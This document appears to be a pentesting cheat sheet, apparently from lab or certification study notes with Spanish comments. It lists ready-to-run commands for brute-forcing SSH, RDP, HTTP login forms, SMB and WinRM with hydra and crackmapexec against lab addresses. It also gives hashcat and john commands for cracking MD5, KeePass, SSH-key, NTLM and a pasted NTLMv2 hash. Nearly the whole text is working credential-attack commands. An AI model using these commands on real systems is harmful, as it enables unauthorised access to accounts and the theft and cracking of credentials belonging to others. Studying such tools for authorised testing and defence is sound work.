SSH
hydra -l george -P /usr/share/wordlists/rockyou.txt ssh://192.168.50.201
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -M ips.txt -s 2222 ssh
RDP
hydra -l george -P /usr/share/wordlists/rockyou.txt rdp://192.168.50.201
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -M ips.txt rdp
cme rdp ips.txt -u USER -p PASSWORD
HTTP
hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
SMB
cme smb ips.txt -u USER -p PASSWORD
WinRM
cme winrm ips.txt -u USER -p PASSWORD
# Identificar tipo de hash
hash-identifier
#Buscar tipo de hash en hashcat
hashcat --help | grep -i "KeePass"
# MD5
hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force
# KeePass
keepass2john Database.kdbx > keepass.hash
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
# SSH Key
ssh2john id_rsa > ssh.hash
hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force
#NTLM
hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
#NTLMv2
echo 'paul::FILES01:25ee64db05285dd0:C3A0EDF62485219D327179F0E945858C:01010000000000000076D7DC39BFDA0126D82E4DB78688FB00000000020008003900310049004F0001001E00570049004E002D004B004B004F003400460046004F0047004E0045004A0004003400570049004E002D004B004B004F003400460046004F0047004E0045004A002E003900310049004F002E004C004F00430041004C00030014003900310049004F002E004C004F00430041004C00050014003900310049004F002E004C004F00430041004C00070008000076D7DC39BFDA0106000400020000000800300030000000000000000000000000200000104E03C87D48BBB6D80BF2579BC979DA56B1D0BDBF6575FD55E2565FF6CACFD00A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003200320031000000000000000000' > paul.hash
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force